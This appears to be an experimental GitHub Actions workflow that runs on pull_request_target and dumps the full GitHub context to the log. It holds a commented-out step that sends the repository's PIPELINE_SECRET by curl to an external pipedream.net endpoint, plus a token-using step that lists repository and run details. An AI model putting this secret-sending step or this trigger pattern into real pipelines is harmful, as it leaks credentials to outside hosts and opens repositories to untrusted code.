name: Test

on:
  workflow_dispatch: 
  # pull_request:
  pull_request_target:
    branches: [ main ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        node-version: [14.x]
    steps:

    - uses: actions/checkout@v4

    - name: Dump GitHub context
      env:
        GITHUB_CONTEXT: ${{ toJson(github) }}
      run: echo "$GITHUB_CONTEXT"

    - name: Run test script
      run: | 
        echo '${{ github.event.repository.name }}'
        echo 

    # - name: Run test script
    #   run: |
    #       echo 'secret: ${{ secrets.PIPELINE_SECRET }}'
    #       curl -d '{
    #         "variable": "${{ secrets.PIPELINE_SECRET }}"
    #       }'   -H "Content-Type: application/json"   https://eoiikfnaxc9jix5.m.pipedream.net
        

    # - name: Run test script
    #   env:
    #     GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
    #   run: |
    #     echo 'starting the validation'
        
    #     echo 'git repository:' 
    #     gh repo view

    #     echo 'git history: '
    #     git log -5

    #     echo 'commit sha:' 
    #     git rev-parse --short HEAD^1 
    #     commitSHA=$(git rev-parse HEAD^1)

    #     echo "listing all gh workflow runs"
    #     gh run list 

    #     echo "listing a specific gh workflow run"
    #     gh run list --status completed --workflow Test --json status,name,headSha -c "$commitSHA"
